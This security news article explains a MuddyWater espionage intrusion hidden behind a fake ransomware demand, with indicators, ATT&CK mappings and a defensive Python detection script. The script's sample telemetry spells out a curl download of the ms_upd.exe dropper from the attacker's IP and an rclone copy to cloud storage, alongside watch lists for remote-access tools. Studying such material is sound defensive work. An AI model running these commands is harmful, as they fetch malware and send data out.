CyberBytes Daily

Trending cyberattacks, explained simply.


How a nation-state spy operation hid inside a ransomware extortion demand

The ransomware demand was fake. No files were ever encrypted. The extortion emails, the data leak portal listing, the negotiation process: all of it was theater, staged by Iranian government hackers to make their espionage operation look like an ordinary criminal shakedown. While the victim's security team focused on the ransom, the attackers were quietly collecting intelligence and maintaining persistent access to the network.

The operation, attributed with moderate confidence to MuddyWater, a group officially assessed by the FBI, CISA, and NSA as a unit of Iran's Ministry of Intelligence and Security (MOIS), began with a Microsoft Teams chat. An employee received an external message from someone posing as a support contact. That conversation escalated to a screen-sharing session. During the session, the attacker asked the employee to type their password into a text file. The employee complied. From that moment, the attackers had everything they needed.

What makes this operation alarming beyond its technical complexity is the strategic insight behind it: the ransomware incident response playbook, the one that trains defenders to treat extortion as the primary threat, was itself the weapon. By triggering a financial-crime response, the attackers bought time for the intelligence collection that was always the real objective. The ransom demand did not just hide the espionage. It redirected the entire defensive response away from it.

Narrative · 6 min read

The Context

MuddyWater is a hacking group operated by Iran's Ministry of Intelligence and Security. Western intelligence agencies, including the FBI, CISA, NSA, and the UK's NCSC, have formally attributed the group to MOIS and documented its focus on espionage against government, defense, and critical infrastructure targets in the United States, Israel, and allied nations.

The operation described here was active in early 2026, overlapping with a period of significant geopolitical tension. U.S. and Israeli military strikes on Iran began on February 28, 2026, under the name Operation Epic Fury. MuddyWater's intrusions into U.S. and Canadian networks had already begun weeks before those strikes, raising concerns that the group had pre-positioned access that could be used for disruptive attacks beyond intelligence collection.

The Attack, Phase by Phase

Phase 1: Teams-Based Social Engineering and Credential Harvest

The attack began not with malware but with a chat message. Attackers sent external Microsoft Teams requests to employees, posing as support personnel or trusted contacts. Once a conversation was established, they escalated to screen-sharing sessions.

During those sessions, attackers ran discovery commands, accessed VPN configuration files, and instructed employees to type their passwords directly into text files on screen. They also used phishing pages disguised as Microsoft Quick Assist download pages to capture credentials through a separate channel.

With credentials in hand, attackers manipulated victims' MFA settings, ensuring their access would survive a password reset. In at least one case, they also installed AnyDesk to create a backup channel into the network.

ATTACKER ACTIONS VIA MICROSOFT TEAMS

  1. External Teams chat initiated: attacker poses as support contact.
  2. Screen-sharing session granted: employee shares screen with attacker.
  3. Credentials harvested: employee types password into text file.
  4. MFA settings manipulated: attacker reconfigures authentication.
  5. Persistent access established: AnyDesk installed as backup channel.

No malware was required to complete Phase 1. The attacker's only tool was a chat window.

Phase 2: Malware Deployment and Persistent Access

With authenticated access, the attackers used Remote Desktop Protocol (RDP) to download a file called ms_upd.exe from an external server using curl, making the activity blend with routine network traffic.

ms_upd.exe is a dropper tracked as Stagecomp. It collected basic system information, contacted a command-and-control server at moonzonet.com, and delivered a custom RAT called Darkcomp, packaged as game.exe. Darkcomp disguised itself as a legitimate Microsoft application and gave attackers persistent shell access.

The attackers also used pythonw.exe to inject code into suspended processes, hiding malicious activity inside legitimate system processes. Remote management tools DWAgent and AnyDesk were installed alongside the malware chain to ensure access even if the malware was later removed.

MALWARE DEPLOYMENT VIA COMPROMISED ACCOUNT

  1. RDP session opened: using stolen, authenticated credentials.
  2. Stagecomp dropper downloaded: ms_upd.exe pulled via curl.
  3. C2 server contacted: Stagecomp calls out to moonzonet.com.
  4. Darkcomp RAT installed: game.exe deployed as WebView2 app.
  5. Persistence locked in: DWAgent and AnyDesk installed.

Darkcomp was signed with a code-signing certificate previously linked to MuddyWater, a key attribution indicator.

Phase 3: Data Exfiltration and Espionage

With persistent access established, the attackers conducted reconnaissance and data theft consistent with intelligence collection. They attempted to exfiltrate data from a U.S. defense and aerospace software company with Israeli operations, using Rclone to copy files to a Wasabi Technologies cloud storage bucket. Whether that transfer succeeded was not confirmed.

Across a broader set of victims—including a U.S. bank, a U.S. airport, and nonprofits in both the U.S. and Canada—the attackers deployed two additional backdoors: Fakeset, a Python-based tool, and Dindoor, which uses the Deno JavaScript runtime. Both were signed with certificates previously linked to MuddyWater.

INTELLIGENCE COLLECTION ACROSS VICTIM NETWORKS

  1. Lateral movement and recon: attackers map the network and identify targets.
  2. Data staged for exfiltration: files collected from the defense supplier.
  3. Rclone exfiltration attempted: data copied to a Wasabi cloud bucket.
  4. Additional backdoors deployed: Fakeset and Dindoor installed.

The breadth of targets suggests intelligence collection across multiple sectors, not a single focused operation.

Phase 4: Ransomware False Flag and Extortion Decoy

No files were ever encrypted. Instead, the attackers sent extortion emails under the branding of Chaos, a real ransomware-as-a-service operation, listed the victim on the Chaos data leak portal, and threatened to publish stolen data unless a ransom was paid.

The victim's security team, facing what appeared to be a ransomware incident, focused its response on the financial threat—consuming time and attention that would otherwise have gone toward hunting the persistent access already installed.

When negotiations stalled and investigators could not locate an actual ransomware payload, the attackers released the stolen data publicly. That release confirmed what Rapid7 had assessed: the ransomware scenario was a deliberate decoy. The extortion was not the goal. It was the cover story.

FALSE FLAG OPERATION

  1. Extortion emails sent: Chaos RaaS branding used throughout.
  2. Victim listed on leak portal: Chaos site shows the organization as a victim.
  3. Ransom negotiations begin: defenders focus on the financial threat.
  4. Data released publicly: no ransomware payload ever found.

The ransomware layer was entirely performative. Its function was to consume defensive resources, not generate ransom revenue.

What Made This Possible

  1. Microsoft Teams allows external contact by default. In many enterprise configurations, anyone outside an organization can initiate a Teams chat with any employee. The attackers did not need to compromise any system to reach their targets.

  2. The ransomware playbook has a blind spot. Incident response procedures for ransomware are designed around a financial-crime model: contain the encryption, negotiate or refuse the ransom, restore from backups. That playbook does not account for a scenario where the ransom demand is itself the misdirection.

  3. Criminal and state-sponsored tooling now share infrastructure. MuddyWater's malware was signed with certificates also used by a commercial malware-as-a-service tool called CastleLoader. When nation-state actors operate through criminal ecosystems, the categorical separation between cybercrime and espionage that defenders use to triage incidents collapses, producing systematic misattribution and delayed response.

What Should Have Stopped This

No single defense would have neutralized this operation. Every control that would have reduced the blast radius shares one trait: it does not depend on correctly identifying the attacker's true motive before acting.

  • Restrict external Teams access. Blocking or requiring approval for external chat from unknown domains removes the initial attack vector entirely. This is a configuration change, not a detection problem.
  • Enforce phishing-resistant MFA. Hardware keys or device-bound credentials cannot be redirected to an attacker's session, preventing access lock-in after credential theft.
  • Treat remote management tool installations as high-priority alerts. Any installation of AnyDesk, DWAgent, or similar tools outside an approved list should trigger immediate review.
  • Separate ransomware response from persistence hunting. The moment a ransomware claim appears without a confirmed encryption event, the investigation should expand to treat the extortion as a potential decoy.

The Takeaway

This operation is the same class of failure as the Stryker Intune wipe: a trusted administrative tool was weaponized against the organization it was built to serve. The difference here is that the attackers added a second layer of misdirection. They did not just weaponize the tools. They weaponized the incident response process itself.

The systemic lesson is not that ransomware is sometimes fake. It is that any categorical label defenders use to triage an incident—ransomware, cybercrime, financial threat—can be deliberately triggered by an attacker who wants defenders thinking about the wrong category. The Chaos branding was not chosen because it was convincing. It was chosen because it was familiar enough to activate a specific, well-rehearsed response.

Pattern to remember: A ransomware demand with no encryption event is not a failed attack. It may be a successful misdirection.

What changed: Incident response categories—the labels defenders use to decide who responds and how—are now attack surfaces that adversaries can deliberately trigger to redirect defensive attention away from their actual objectives.

Technical Deep Dive · 3 min

The Technical Mechanism

The intrusion chain began with Microsoft Teams external chat requests, exploiting default tenant configurations that permit unsolicited external contact. Attackers escalated to screen-sharing sessions to conduct live credential harvesting, instructing victims to input credentials into locally created text files and using phishing pages mimicking Microsoft Quick Assist to capture credentials through a parallel channel. Post-credential-capture, attackers modified Azure Active Directory MFA settings on compromised accounts to ensure persistent authenticated access.

The malware deployment chain proceeded as follows:

  • ms_upd.exe (Stagecomp): a dropper downloaded via curl from 172.86.126.208 over RDP. Stagecomp collects system telemetry, contacts moonzonet.com for C2 tasking, and drops the next-stage payload.
  • game.exe (Darkcomp): a bespoke RAT that masquerades as a Microsoft WebView2 application by sideloading WebView2Loader.dll. Supports command execution, file manipulation, and persistent shell execution. Signed with a code-signing certificate attributed to "Donald Gay," previously used to sign MuddyWater tooling including Fakeset and CastleLoader variants.
  • visualwincomp.txt: a configuration or payload file dropped alongside Darkcomp, exact function not publicly disclosed.
  • pythonw.exe was used to inject code into suspended processes, a process-hollowing variant used to hide malicious execution within legitimate system processes.

The Dindoor backdoor, deployed on the U.S. bank, Canadian nonprofit, and Israeli software company networks, uses the Deno JavaScript/TypeScript runtime for execution. This is a deliberate evasion choice: Deno is less commonly monitored than Node.js and allows execution of arbitrary JavaScript without a traditional compiled binary. Dindoor is signed with a certificate issued to "Amy Cherne."

Fakeset is a Python-based backdoor found on U.S. airport and nonprofit networks, signed with certificates issued to both "Amy Cherne" and "Donald Gay," and downloaded from Backblaze cloud storage servers, another evasion technique using trusted cloud infrastructure for payload delivery.

The false-flag layer involved no technical ransomware deployment. The Chaos RaaS brand was used exclusively through extortion emails and data leak portal listings. No encryption binary, ransomware configuration, or decryption key infrastructure was identified on victim systems.

FULL TECHNICAL INFECTION CHAIN

  1. Teams social engineering: external chat, screen share, credentials.
  2. MFA reconfiguration: Azure AD MFA modified on the account.
  3. Stagecomp dropper (ms_upd.exe): curl download from 172.86.126.208.
  4. C2 beacon to moonzonet.com: Stagecomp checks in, receives tasking.
  5. Darkcomp RAT (game.exe): WebView2 sideload, Donald Gay certificate.
  6. DWAgent and AnyDesk installed: persistent access, malware-independent.

The Donald Gay code-signing certificate is the primary technical attribution anchor linking this chain to MuddyWater.

CVE and Advisories

No CVE identifier applies to this intrusion. The attack did not exploit a software vulnerability. It exploited default Microsoft Teams tenant configuration (permitting external chat initiation), human compliance during social engineering, and standard operating system utilities (curl, pythonw.exe, RDP) for malware delivery.

Relevant prior advisories on MuddyWater tradecraft:

MITRE ATT&CK Mapping

Technique ID, ATT&CK name, and how it appeared:

  • T1566.004 (Phishing: Spearphishing via Service): Attackers used Microsoft Teams external chat to initiate contact with victims, bypassing email-based phishing defenses.
  • T1204.001 (User Execution: Malicious Link): Victims were directed to phishing pages mimicking Microsoft Quick Assist to capture credentials.
  • T1078 (Valid Accounts): Stolen credentials used to authenticate to victim systems, blending attacker activity with legitimate user behavior.
  • T1556 (Modify Authentication Process): MFA settings on compromised accounts were manipulated to ensure persistent authenticated access.
  • T1105 (Ingress Tool Transfer): Stagecomp dropper downloaded via curl from external server 172.86.126.208 over an RDP session.
  • T1055 (Process Injection): pythonw.exe used to inject code into suspended processes to hide malicious execution.
  • T1219 (Remote Access Software): AnyDesk and DWAgent installed to maintain persistent remote access independent of the malware chain.
  • T1567 (Exfiltration Over Web Service): Rclone used to attempt data exfiltration to a Wasabi Technologies cloud storage bucket.
  • T1036 (Masquerading): Darkcomp RAT disguised as a Microsoft WebView2 application via DLL sideloading. Chaos RaaS branding used to masquerade as financially motivated criminal activity.
  • T1588.003 (Obtain Capabilities: Code Signing Certificates): Malware signed with certificates attributed to Donald Gay and Amy Cherne, previously linked to MuddyWater tooling, to appear legitimate and complicate attribution.

Indicators of Compromise

Network Indicators

  • C2 domain: moonzonet.com
  • Dropper download server: 172.86.126.208
  • Exfiltration target: Wasabi Technologies cloud storage (bucket details not publicly disclosed)
  • Payload delivery: Backblaze cloud storage servers (Fakeset)

File Indicators

  • ms_upd.exe (Stagecomp dropper)
  • game.exe (Darkcomp RAT)
  • WebView2Loader.dll (sideloaded by Darkcomp)
  • visualwincomp.txt (Darkcomp configuration/payload)

Certificate Indicators

  • Code-signing certificate: "Donald Gay" (signs Stagecomp, Darkcomp, Fakeset, CastleLoader variants)
  • Code-signing certificate: "Amy Cherne" (signs Dindoor, Fakeset)

Detection Notes

Detection is significantly complicated by the attacker's use of legitimate tools throughout the chain: Teams for initial access, RDP and curl for delivery, pythonw.exe for injection, AnyDesk and DWAgent for persistence. Microsoft and Kaspersky have published signatures: Trojan:Python/MuddyWater.DB!MTB (Microsoft) and Backdoor.Python.MuddyWater.a (Kaspersky). The absence of a ransomware encryption event in a purported ransomware incident is itself a detection signal.
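As an added example (not code from the article, from Rapid7, or from any vendor signature), the following Python sketch turns the controls listed under "What Should Have Stopped This" and the detection notes above into rules run over constructed telemetry. It matches the article's own indicators (moonzonet.com, 172.86.126.208, the file names, the two signer names), flags remote-management tools outside an allow-list, curl downloads of executables, pythonw.exe injecting into another process (the kind of record Sysmon Event ID 8 produces), Rclone runs and bulk uploads to cloud storage, and then sets the response posture: an extortion claim with no encryption event is treated as a suspected decoy so persistence hunting starts immediately. The event schema, the allow-list contents, the TeamViewer.exe and rclone.exe names, the Wasabi/Backblaze hostname patterns, the 50 MB upload threshold and every IP other than 172.86.126.208 are assumptions or constructed sample values.

```python
"""Detection and triage sketch for the MuddyWater-style chain in this article.
Added example, not from the article or Rapid7; all events below are constructed."""
import re
from typing import Iterable

# Indicators quoted from the article's IoC section.
C2_DOMAINS = {"moonzonet.com"}
DOWNLOAD_SERVERS = {"172.86.126.208"}
KNOWN_BAD_FILES = {"ms_upd.exe", "game.exe", "visualwincomp.txt"}
KNOWN_BAD_SIGNERS = {"donald gay", "amy cherne"}

# Assumptions: remote-management binaries to watch, the ones local policy approves,
# S3-style hostnames an Rclone upload to Wasabi/Backblaze would contact, and a
# bulk-upload threshold. Adjust all of these to the environment being monitored.
REMOTE_MGMT_BINARIES = {"anydesk.exe", "dwagent.exe", "teamviewer.exe"}
APPROVED_REMOTE_MGMT = {"teamviewer.exe"}
CLOUD_STORAGE_RE = re.compile(r"(^|\.)(wasabisys\.com|backblazeb2\.com)$")
BULK_UPLOAD_BYTES = 50_000_000
PERSISTENCE_RULES = {"unapproved_remote_mgmt", "known_c2_domain",
                     "known_bad_signer", "pythonw_remote_thread"}


def _basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def evaluate(event: dict) -> list:
    """Return (severity, rule, detail) findings for one telemetry event."""
    findings = []
    kind = event.get("type")
    if kind == "process":
        image = _basename(event["image"])
        cmd = event.get("cmdline", "").lower()
        if image == "curl.exe" and re.search(r"https?://\S+\.exe\b", cmd):
            findings.append(("high", "curl_exe_download", cmd))
            if any(ip in cmd for ip in DOWNLOAD_SERVERS):
                findings.append(("critical", "known_dropper_server", cmd))
        if image in KNOWN_BAD_FILES:
            findings.append(("critical", "known_bad_filename", image))
        if image in REMOTE_MGMT_BINARIES and image not in APPROVED_REMOTE_MGMT:
            findings.append(("high", "unapproved_remote_mgmt", image))
        if image == "rclone.exe":
            findings.append(("high", "rclone_execution", cmd))
    elif kind == "network":
        host = event.get("dest_host", "").lower()
        if host in C2_DOMAINS:
            findings.append(("critical", "known_c2_domain", host))
        if event.get("dest_ip") in DOWNLOAD_SERVERS:
            findings.append(("critical", "known_dropper_server", event["dest_ip"]))
        if CLOUD_STORAGE_RE.search(host) and event.get("bytes_out", 0) > BULK_UPLOAD_BYTES:
            findings.append(("high", "bulk_upload_cloud_storage", host))
    elif kind == "remote_thread":  # shape of a Sysmon Event ID 8 (CreateRemoteThread) record
        if _basename(event.get("source_image", "")) == "pythonw.exe":
            findings.append(("high", "pythonw_remote_thread",
                             _basename(event.get("target_image", ""))))
    elif kind == "signature":
        if event.get("signer", "").lower() in KNOWN_BAD_SIGNERS:
            findings.append(("critical", "known_bad_signer", event["signer"]))
    return findings


def triage(events: Iterable[dict]) -> dict:
    """Aggregate findings and pick a response posture. An extortion claim with no
    encryption event is a suspected decoy: hunt persistence before negotiating."""
    findings, claim, encrypted = [], False, False
    for ev in events:
        findings.extend(evaluate(ev))
        claim |= ev.get("type") == "extortion_claim"
        encrypted |= ev.get("type") == "encryption_event"
    if claim and not encrypted:
        posture = "decoy_suspected"
    elif claim:
        posture = "ransomware_incident"
    else:
        posture = "no_extortion_claim"
    return {"findings": findings, "posture": posture,
            "persistence_seen": any(r in PERSISTENCE_RULES for _, r, _ in findings)}


# Constructed sample telemetry mirroring the article's chain (203.0.113.x are test addresses).
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl.exe -o C:\Users\Public\ms_upd.exe http://172.86.126.208/ms_upd.exe"},
    {"type": "process", "image": r"C:\Users\Public\ms_upd.exe", "cmdline": "ms_upd.exe"},
    {"type": "network", "dest_host": "moonzonet.com", "dest_ip": "203.0.113.10"},
    {"type": "signature", "path": r"C:\Users\Public\game.exe", "signer": "Donald Gay"},
    {"type": "remote_thread", "source_image": r"C:\Python311\pythonw.exe",
     "target_image": r"C:\Windows\System32\svchost.exe"},
    {"type": "process", "image": r"C:\Program Files\AnyDesk\AnyDesk.exe",
     "cmdline": "AnyDesk.exe --install"},
    {"type": "process", "image": r"C:\Tools\rclone.exe",
     "cmdline": r"rclone copy D:\staging wasabi:bucket"},
    {"type": "network", "dest_host": "s3.wasabisys.com", "dest_ip": "203.0.113.20",
     "bytes_out": 812_000_000},
    {"type": "extortion_claim", "brand": "Chaos"},
]

if __name__ == "__main__":
    result = triage(SAMPLE_EVENTS)
    for severity, rule, detail in result["findings"]:
        print(f"[{severity}] {rule}: {detail}")
    print("posture:", result["posture"], "| persistence seen:", result["persistence_seen"])
```

The point of the `triage` step is the one the article makes about playbooks: the posture is decided by what the telemetry does not contain (no encryption event) rather than by what the extortion email claims, so the same rules produce a persistence hunt regardless of which ransomware brand the attackers chose.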

Attribution

Rapid7 attributes this intrusion to MuddyWater (also tracked as Seedworm, Static Kitten, Mango Sandstorm, MERCURY, TEMP.Zagros, TA450) with moderate confidence, based on four infrastructure and tradecraft indicators: (1) the "Donald Gay" code-signing certificate, previously linked to MuddyWater by Google, Microsoft, and Kaspersky; (2) the moonzonet.com C2 domain, previously associated with MuddyWater operations; (3) use of pythonw.exe for process injection, a documented MuddyWater technique; and (4) interactive Microsoft Teams sessions for credential and MFA harvesting, consistent with documented MuddyWater tradecraft.

The broader February 2026 campaign was independently attributed to Seedworm/MuddyWater by Broadcom Symantec and Carbon Black based on overlapping certificate infrastructure. MuddyWater is formally assessed by the FBI, CISA, NSA, and UK NCSC as a subordinate element of MOIS.

Check Point Research documented MuddyWater's prior use of Qilin ransomware in an October 2025 attack on Israel's Shamir Medical Center. Israel's National Cyber Directorate initially attributed that attack to Eastern European criminals before correcting the record and blaming Iran. Rapid7 assesses the switch from Qilin to Chaos branding was a deliberate effort to reduce attribution risk following the public exposure of the Qilin-linked operation.


Primary Sources